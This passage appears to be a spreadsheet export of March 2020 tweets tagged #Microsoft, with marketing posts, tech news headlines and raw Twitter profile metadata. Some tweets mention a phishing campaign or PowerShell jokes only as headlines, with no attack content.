    <t>{'id': 173448820, 'id_str': '173448820', 'name': 'ðŸ‡ªðŸ‡ºðŸ‡®ðŸ‡¹ James Edward Tweed ðŸ´\U000e0067\U000e0062\U000e0077\U000e006c\U000e0073\U000e007fðŸ‡ªðŸ‡º', 'screen_name': 'Jetweed', 'location': 'Roma', 'description': 'Technology Lover / Italian Speaker / Proud to be Welsh!  #MakeWalesMatter #IamEuropean', 'url': 'https://t.co/doMHIOLmMh', 'entities': {'url': {'urls': [{'url': 'https://t.co/doMHIOLmMh', 'expanded_url': 'http://it.linkedin.com/in/jetweed/', 'display_url': 'it.linkedin.com/in/jetweed/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 90, 'friends_count': 553, 'listed_count': 4, 'created_at': 'Sun Aug 01 14:14:07 +0000 2010', 'favourites_count': 196, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 628,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'http://pbs.twimg.com/profile_images/976756538936381440/XFM5BiJj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/976756538936381440/XFM5BiJj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/173448820/1521711953',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</si>
  <si>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19:08:50 +0000 2020</t>
  </si>
  <si>
    <t>@Google, @Microsoft, and @Facebook are just some of the companies that have cancelled scheduled conferences due to Coronavirus fears.
#Tech #TechNews #Technology #News  #InfoTech #IT #ManagedServices #Google #Microsoft #Facebook #TechConferences #Coronavirus2020 #COVID19 https://t.co/5p8QZyigfF</t>
  </si>
  <si>
    <t>Rated Top #Book to Read in 2020: Ultimate Guide to #Microsoft Certification
 #Top10 #Azure #AzureFamily
https://t.co/U97HaD6XYe</t>
  </si>
  <si>
    <t>Wed Mar 04 19:07:59 +0000 2020</t>
  </si>
  <si>
    <t>We have indexing connectors for #Amazon #Elasticsearch, #Azure Cognitive Search, #Elasticsearch, #SharePoint Online/#Microsoft Search, SharePoint On-Premise and #Solr. Check out our list of over 70 connectors! https://t.co/KhkjU06BZ1</t>
  </si>
  <si>
    <t>{'id': 211750678, 'id_str': '211750678', 'name': 'BA Insight', 'screen_name': 'BAinsight', 'location': 'Boston, MA', 'description': 'We help companies modernize their enterprise search implementations with personalized, relevant search experiences.', 'url': 'http://t.co/goMDXbauce', 'entities': {'url': {'urls': [{'url': 'http://t.co/goMDXbauce', 'expanded_url': 'http://www.BAinsight.com', 'display_url': 'BAinsight.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 722, 'friends_count': 670, 'listed_count': 102, 'created_at': 'Thu Nov 04 03:58:46 +0000 2010', 'favourites_count': 162, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2930,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'http://pbs.twimg.com/profile_images/1141021340125794304/QOeANFa3_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141021340125794304/QOeANFa3_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/211750678/1560875967', 'profile_link_color': '0078D7', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '7AC3EE', 'profile_text_color': '3D1957', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 19:06:52 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft releases living-off-the-land-for-hackers version 7 today!
#cybersecurity #cyberattack #WhoNeedsMalwareWhenYouHavePowershell
https://t.co/JCgobd8o3H</t>
  </si>
  <si>
    <t>{'id': 126366218, 'id_str': '126366218', 'name': 'Ralph P. Martins Jr.', 'screen_name': 'ralphmartins', 'location': 'Washington, DC area', 'description': 'Founder/CEO @_RPMConsulting_ | Adjunct #cybersecurity professor @Websteru | @USMC vet | #libertarian | @Yankees/@Giants | #Hunter | #Catholic | whiskey &amp; cigars', 'url': 'https://t.co/jRVlPgofyI', 'entities': {'url': {'urls': [{'url': 'https://t.co/jRVlPgofyI', 'expanded_url': 'https://www.linkedin.com/in/ralphmartins/', 'display_url': 'linkedin.com/in/ralphmartinâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 802, 'friends_count': 197, 'listed_count': 11, 'created_at': 'Thu Mar 25 16:50:16 +0000 2010', 'favourites_count': 909, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3417,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'http://pbs.twimg.com/profile_images/1141845040987299845/WQOGqphs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141845040987299845/WQOGqphs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/126366218/1571771408', 'profile_link_color': '667962',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</si>
  <si>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Wed Mar 04 19:06:26 +0000 2020</t>
  </si>
  <si>
    <t>With #AI, any sized company can leverage their data and excel at decision making. Download the 'Competing in the Digital Age' eBook to learn how.    #Microsoft #Technology #BusinessAutomation #MSDyn365 https://t.co/BEktR18ldW</t>
  </si>
  <si>
    <t>{'id': 1694038598, 'id_str': '1694038598', 'name': 'Marshall Dilts', 'screen_name': 'ctscanada1', 'location': 'Edmonton, Alberta', 'description': "Empower Corp. Specializing in Cloud technology's and office productivity applications. Microsoft certified partner.", 'url': 'https://t.co/KiFXB1IDnG', 'entities': {'url': {'urls': [{'url': 'https://t.co/KiFXB1IDnG', 'expanded_url': 'http://www.empowercorp.ca', 'display_url': 'empowercorp.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 242, 'friends_count': 533, 'listed_count': 6, 'created_at': 'Fri Aug 23 14:47:13 +0000 2013', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 694,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'http://pbs.twimg.com/profile_images/511888536627208193/NknfW9x7_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/511888536627208193/NknfW9x7_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1694038598/1410879011',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</si>
  <si>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19:06:01 +0000 2020</t>
  </si>
  <si>
    <t>Improve your teams efficiency by using #Microsoft #Teams. Team members can tailor workspaces with content and apps they need every day. They can add tabs like a Word document to provide quick access. Or add apps like Jira to bring relevant information into your hub for teamwork. https://t.co/8upCZxoc1N</t>
  </si>
  <si>
    <t>{'id': 1184544176974843910, 'id_str': '1184544176974843910', 'name': 'Chiron', 'screen_name': 'ChironUsa', 'location': 'Washington, DC', 'description': 'IT Consulting company that cares about our clients and is ready to share our expertise with you.\n\nProcess Automation, Data Services integration, Software dev', 'url': 'https://t.co/j8XLNMndh6', 'entities': {'url': {'urls': [{'url': 'https://t.co/j8XLNMndh6', 'expanded_url': 'https://chironusa.com', 'display_url': 'chironusa.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1001, 'friends_count': 1320, 'listed_count': 2, 'created_at': 'Wed Oct 16 18:59:08 +0000 2019', 'favourites_count': 2713, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 71, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1184544382869016576/u3UgC86t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1184544382869016576/u3UgC86t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1184544176974843910/1571252559',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</si>
  <si>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19:05:14 +0000 2020</t>
  </si>
  <si>
    <t>Configuring the #Microsoft @Azure #VPN gateway for #Windows 10 Always On VPN. #Windows10 #Win10 #mobility #cloud #publiccloud #Azure #aovpn https://t.co/4xSNffZksO</t>
  </si>
  <si>
    <t>Wed Mar 04 19:04:55 +0000 2020</t>
  </si>
  <si>
    <t>NO COST!
Ethos Lab Teen March Break Co-creation Camp 2020! 
There are only 30 spots! Register for the co-creation camp here: https://t.co/wDgZocKvLe 
#youth #springbreak2020 #techcamp #diversity #stem #steam #nobarriers #teens #march #britishcolumbia #weareethos #Microsoft https://t.co/P24qWFjpZl</t>
  </si>
  <si>
    <t>{'id': 1035591700045918209, 'id_str': '1035591700045918209', 'name': 'Upkar.Tatlay', 'screen_name': 'TatlayUpkar', 'location': 'Surrey, British Columbia', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 126, 'friends_count': 208, 'listed_count': 0, 'created_at': 'Fri Aug 31 18:14:36 +0000 2018', 'favourites_count': 498, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 181, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1120709404473450498/ARUTh1FH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1120709404473450498/ARUTh1FH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1035591700045918209/1542165321',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</si>
  <si>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19:04:03 +0000 2020</t>
  </si>
  <si>
    <t>We were recommended to Oasis Fashion by #Microsoft directly. Check out how we supported their journey to #Offfice365 
#casestudy
https://t.co/ZbqzNKRyY9 https://t.co/KIw4pJTitn</t>
  </si>
  <si>
    <t>{'id': 95074130, 'id_str': '95074130', 'name': 'Trustmarque', 'screen_name': 'Trustmarque', 'location': 'York, UK', 'description': 'Trustmarque deliver customer-centric IT solutions that enable better outcomes and drive digital transformation. Part of Capita Plc.', 'url': 'https://t.co/5g6ok380tW', 'entities': {'url': {'urls': [{'url': 'https://t.co/5g6ok380tW', 'expanded_url': 'http://www.trustmarque.com', 'display_url': 'trustmarque.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1975, 'friends_count': 660, 'listed_count': 341, 'created_at': 'Sun Dec 06 21:17:49 +0000 2009', 'favourites_count': 390, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5871, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '024D70', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1231943713544425472/ZNB4ptCP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231943713544425472/ZNB4ptCP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/95074130/1582540811', 'profile_link_color': '40B4E5', 'profile_sidebar_border_color': '2A3033', 'profile_sidebar_fill_color': 'D6D6D6', 'profile_text_color': '4D575C', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 19:03:58 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how Fimmaec IT Consulting Group can accelerate your journey with #Microsoft #Azure. https://t.co/qdO9OnQTee</t>
  </si>
  <si>
    <t>{'id': 1086041929605877760, 'id_str': '1086041929605877760', 'name': 'Fimmaec IT Consulting Group', 'screen_name': 'FimmaecG', 'location': 'Orlando FL', 'description': '', 'url': 'https://t.co/hZpYhbS2tO', 'entities': {'url': {'urls': [{'url': 'https://t.co/hZpYhbS2tO', 'expanded_url': 'http://www.fimmaecit.com', 'display_url': 'fimmaecit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 94, 'listed_count': 1, 'created_at': 'Thu Jan 17 23:25:48 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1911, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1086042415432052736/dirQvBcF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1086042415432052736/dirQvBcF_normal.jpg',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</si>
  <si>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19:02:20 +0000 2020</t>
  </si>
  <si>
    <t>Watch how @wildandwolf transformed their business with #MSDyn365 by providing employees a single platform in the cloud. #Microsoft #Technology #IT #BusinessAutomation https://t.co/2Jrtt3CkMU</t>
  </si>
  <si>
    <t>{'id': 769339690877128708, 'id_str': '769339690877128708', 'name': 'ComputeWorks', 'screen_name': 'ComputeWorks', 'location': 'BoyacÃ¡, Colombia', 'description': 'Get the most out of your IT with world ready technologies and solutions for your business. A @FenixAlliance Team. #MicrosoftPartner #IntelPartnerGold #MCSP #IBM', 'url': 'https://t.co/ahpya6cR06', 'entities': {'url': {'urls': [{'url': 'https://t.co/ahpya6cR06', 'expanded_url': 'https://fenixalliance.com.co/technologies', 'display_url': 'fenixalliance.com.co/technologies', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 243, 'friends_count': 1693, 'listed_count': 16, 'created_at': 'Sat Aug 27 01:04:10 +0000 2016', 'favourites_count': 479, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1756,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'http://pbs.twimg.com/profile_images/1113847478661648385/0gUbEJh2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1113847478661648385/0gUbEJh2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/769339690877128708/1532442156', 'profile_link_color': '005B13',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</si>
  <si>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19:02:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft expands partnership with National Football League. Multiyear deal will help NFL coaches &amp;amp; players be more efficient with Microsoft Surface devices &amp;amp; Microsoft Teams https://t.co/JM0kr8c56V #NFL #Microsoft https://t.co/RHSL1IJuOb</t>
  </si>
  <si>
    <t>Wed Mar 04 19:01:17 +0000 2020</t>
  </si>
  <si>
    <t>Make sure you update your container images from @Docker Hub! v7 is finally out!
#PowerShell #Microsoft #Docker #DevOps https://t.co/WutThup2hf</t>
  </si>
  <si>
    <t>{'id': 18421909, 'id_str': '18421909', 'name': 'Trevor Sullivan ðŸš€', 'screen_name': 'pcgeek86', 'location': 'Seattle, Washington', 'description': 'Rebellion to tyrants is obedience to God.', 'url': 'https://t.co/w3Y7TGihwh', 'entities': {'url': {'urls': [{'url': 'https://t.co/w3Y7TGihwh', 'expanded_url': 'https://trevorsullivan.net', 'display_url': 'trevorsullivan.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4250, 'friends_count': 1140, 'listed_count': 529, 'created_at': 'Sun Dec 28 04:29:46 +0000 2008', 'favourites_count': 4082, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 36912, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0A070A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/911373433866301441/qMV6nUWB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/911373433866301441/qMV6nUWB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18421909/1515509252', 'profile_link_color': 'FF9900',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</si>
  <si>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Wed Mar 04 19:01:12 +0000 2020</t>
  </si>
  <si>
    <t>Jeffrey Eyestone, healthcare AI advisor at CognitiveScale discussed the ambition and potential effects of Microsoft's $40 million initiative.
https://t.co/YXcmjHZIPt
#AI #Microsoft #Healthtech #cognitivescale #AIforHealth #AIApplications #data #scalability #AInews #healthprojects</t>
  </si>
  <si>
    <t>{'id': 934749505, 'id_str': '934749505', 'name': 'fusemachines', 'screen_name': 'fusemachines', 'location': 'New York, NY', 'description': 'AI solutions &amp; services provider empowering everyone to leverage AI by running schools in underserved communities and connecting talent with job opportunities.', 'url': 'https://t.co/nofAyGT5WW', 'entities': {'url': {'urls': [{'url': 'https://t.co/nofAyGT5WW', 'expanded_url': 'http://www.fusemachines.com', 'display_url': 'fusemachines.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3752, 'friends_count': 1801, 'listed_count': 1184, 'created_at': 'Thu Nov 08 15:22:50 +0000 2012', 'favourites_count': 1376, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12249,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'http://pbs.twimg.com/profile_images/930169034099716096/2crk11Vw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/930169034099716096/2crk11Vw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/934749505/1525448700', 'profile_link_color': '616D89',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</si>
  <si>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19:01:06 +0000 2020</t>
  </si>
  <si>
    <t>With a #Microsoft #Sharepoint #intranet your teams can share files, data &amp;amp; resources and collaborate on work. Get SharePoint for better teamwork today:  https://t.co/uCjverHFed https://t.co/eWfke2BsWG</t>
  </si>
  <si>
    <t>{'id': 171657049, 'id_str': '171657049', 'name': 'SA Technologies Inc.', 'screen_name': 'Satincorp', 'location': 'CA', 'description': 'One of the fastest growing Silicon-Valley IT Consulting Enterprises.', 'url': 'https://t.co/OqN3S2Q5R5', 'entities': {'url': {'urls': [{'url': 'https://t.co/OqN3S2Q5R5', 'expanded_url': 'http://www.satechglobal.com', 'display_url': 'satechglobal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 570, 'friends_count': 415, 'listed_count': 46, 'created_at': 'Tue Jul 27 21:31:03 +0000 2010', 'favourites_count': 325, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5402,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'http://pbs.twimg.com/profile_images/562874929779974144/nI0HINf-_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/562874929779974144/nI0HINf-_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/171657049/1570191956', 'profile_link_color': '0099B9', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 19:01:04 +0000 2020</t>
  </si>
  <si>
    <t>Digital transformation is powering open-source collaboration in China. Where is your company on the path to digital transformation? Contact us to learn how Online Computers can accelerate your journey with #Microsoft #Azure. https://t.co/2tZkReLs41</t>
  </si>
  <si>
    <t>{'id': 98570228, 'id_str': '98570228', 'name': 'Online Computers', 'screen_name': 'onlinecomputers', 'location': 'Whippany, NJ', 'description': 'Leave The Technology to Us!', 'url': 'https://t.co/G83Tthyxph', 'entities': {'url': {'urls': [{'url': 'https://t.co/G83Tthyxph', 'expanded_url': 'http://onlinecomputers.com', 'display_url': 'onlinecomputers.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 24, 'listed_count': 0, 'created_at': 'Tue Dec 22 06:40:23 +0000 2009', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 360,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'http://pbs.twimg.com/profile_images/979921660898930688/o-j99qwb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/979921660898930688/o-j99qwb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/98570228/1527755165',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</si>
  <si>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19:00:28 +0000 2020</t>
  </si>
  <si>
    <t>Our partnership with @Microsoft allows us to leverage the latest data visualization technology with Power BI. BI has the power to transform any organization &amp;amp; Impact Analytics featuring Power BI is the tool you need. 
#PowerBI #Microsoft #BusinessIntelligence #PowerBISolutions https://t.co/MhNHEVlDd8</t>
  </si>
  <si>
    <t>{'id': 719322594, 'id_str': '719322594', 'name': 'Vizion360', 'screen_name': 'v360_', 'location': 'Independence, Ohio', 'description': 'Delivering Data. Empowering Growth. We are a Business Intelligence firm that partners with our clients to help them harness the power of their data.', 'url': 'https://t.co/3MZU0RTl5Q', 'entities': {'url': {'urls': [{'url': 'https://t.co/3MZU0RTl5Q', 'expanded_url': 'http://www.vizion360.com', 'display_url': 'vizion360.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 126, 'friends_count': 196, 'listed_count': 21, 'created_at': 'Fri Jul 27 03:21:12 +0000 2012', 'favourites_count': 216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 353, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '91D2FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1123654475447713792/fg2-n-U4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1123654475447713792/fg2-n-U4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/719322594/1556734294',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</si>
  <si>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19:00:12 +0000 2020</t>
  </si>
  <si>
    <t>Wraith exploit 
#ApexLegends #battleroyal #xboxone #microsoft #gamer #gaming #apexgaming https://t.co/dxj1OD6BGA</t>
  </si>
  <si>
    <t>{'id': 1234013486230802433, 'id_str': '1234013486230802433', 'name': 'seizepark47', 'screen_name': 'Seizepark47', 'location': '', 'description': 'gamer for life ðŸ˜œðŸ•¹\napex legends: diamond 2 baby!!!\nif your looking for quality clips, then look no further my friendðŸ˜ŠðŸ‘Œ \nFollow ðŸ™ðŸ‘‰https://t.co/VqGs1QSxcx', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/VqGs1QSxcx', 'expanded_url': 'http://instagra.com/seizep', 'display_url': 'instagra.com/seizep', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 2, 'friends_count': 3, 'listed_count': 0, 'created_at': 'Sun Mar 01 07:12:09 +0000 2020', 'favourites_count': 13,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'http://pbs.twimg.com/profile_images/1234013725352288258/sUmMUVBA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234013725352288258/sUmMUVBA_normal.jpg',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</si>
  <si>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19:00:00 +0000 2020</t>
  </si>
  <si>
    <t>Take a snip of what's on your screen https://t.co/uxX9CJaApC? #w10 #microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 18:59:44 +0000 2020</t>
  </si>
  <si>
    <t>Foxconn expects to bring workers back to work by the end of March.
https://t.co/XFJ77UkLdM
#foxconn #apple #iphone #china #coronavirus #world #business #tech #news #insidetechworld #technology #sony #microsoft #nintendo #blackberry</t>
  </si>
  <si>
    <t>Wed Mar 04 18:56:15 +0000 2020</t>
  </si>
  <si>
    <t>#aws #Microsoft or #google which is a better path for data certification? @awscloud @Azure @googledevs</t>
  </si>
  <si>
    <t>{'id': 108110714, 'id_str': '108110714', 'name': 'Romal Kumar', 'screen_name': 'romalkumar', 'location': 'Whitby, ON', 'description': 'I help families find their dream home', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 214, 'listed_count': 0, 'created_at': 'Sun Jan 24 22:05:40 +0000 2010', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1230213334437441538/wDlUJaO8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230213334437441538/wDlUJaO8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/108110714/1582140691',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</si>
  <si>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18:53:36 +0000 2020</t>
  </si>
  <si>
    <t>This session was a huge success as in the end everyone was feeling that they got something new today.
Kudos  to my organizing team. I am extremely thankful to @_mercurybuddy @sumittyagi1998 for their continuous guidance and support. 
#azure #Microsoft https://t.co/ovPGuoWg5b</t>
  </si>
  <si>
    <t>{'id': 4737925032, 'id_str': '4737925032', 'name': 'Pawan Jain #MSFTStudentPartner', 'screen_name': 'jain_pawan21', 'location': 'Gohana, Haryana, India', 'description': '@Microsoft Student Partner, Mentor @girlscriptsoc , Programmer, Full Stack Developer, Enginner || à¤œà¥ˆà¤¨à¤® à¤œà¤¯à¤¤à¤¿ à¤¶à¤¾à¤¸à¤¨à¤®à¥ ||', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 209, 'listed_count': 0, 'created_at': 'Sun Jan 10 11:22:07 +0000 2016', 'favourites_count': 1023, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 225, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1220682060584538113/It3r0E71_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220682060584538113/It3r0E71_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4737925032/1575283256',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</si>
  <si>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18:52:42 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports #Microsoft #Azure #Cloud https://t.co/Z5r4WJ9Cl9</t>
  </si>
  <si>
    <t>Wed Mar 04 18:50:08 +0000 2020</t>
  </si>
  <si>
    <t>Bose Frames work with Microsoft's navigation tech for the blind
#Bose
#Microsoft
https://t.co/92KMCiWbdf</t>
  </si>
  <si>
    <t>{'id': 334051007, 'id_str': '334051007', 'name': 'First Stop IT', 'screen_name': 'firststopit', 'location': 'Essex, Hertfordshire &amp; London', 'description': 'First Stop IT - An IT department for the cost of 1 employee', 'url': 'http://t.co/eSujsiqTAr', 'entities': {'url': {'urls': [{'url': 'http://t.co/eSujsiqTAr', 'expanded_url': 'http://www.firststopit.co.uk', 'display_url': 'firststopit.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 186, 'friends_count': 289, 'listed_count': 3, 'created_at': 'Tue Jul 12 14:10:13 +0000 2011', 'favourites_count': 364, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2884,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'http://pbs.twimg.com/profile_images/983129162167803904/5lWITvRE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/983129162167803904/5lWITvRE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/334051007/1548112294', 'profile_link_color': '1F8FCE',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</si>
  <si>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18:50:02 +0000 2020</t>
  </si>
  <si>
    <t>Hello gamers! 
Do you guys remember this game? Super old, Yes I'm aware but Microsoft made a new redesign.
The game is available for PC at $10
#halo #game #Microsoft https://t.co/kOXbX84Q9O</t>
  </si>
  <si>
    <t>{'id': 795665604724355072, 'id_str': '795665604724355072', 'name': 'Wï½…ï½‰ï½’ï½„ ï¼®ï½…ï½…ï½‡ï½ðŸŽƒ', 'screen_name': 'pilotdigital', 'location': '', 'description': 'Techie ðŸ’» niggaðŸŒš, â¤ï¸ PostyFan community||\n\nI want to connect and make friends with people from different raceðŸŒ .', 'url': 'https://t.co/A5SuJBWefJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/A5SuJBWefJ', 'expanded_url': 'http://www.fcpilot.com', 'display_url': 'fcpilot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 208, 'friends_count': 448, 'listed_count': 0, 'created_at': 'Mon Nov 07 16:33:57 +0000 2016', 'favourites_count': 1155, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1521, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233151379415470080/2xX3Ov3v_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233151379415470080/2xX3Ov3v_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/795665604724355072/1576541222',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</si>
  <si>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18:49:20 +0000 2020</t>
  </si>
  <si>
    <t>A #phishing campaign leveraged #Microsoft OneNote to bypass detection tools and download the Agent Tesla malware onto victims systems.
https://t.co/Z158C573Fk</t>
  </si>
  <si>
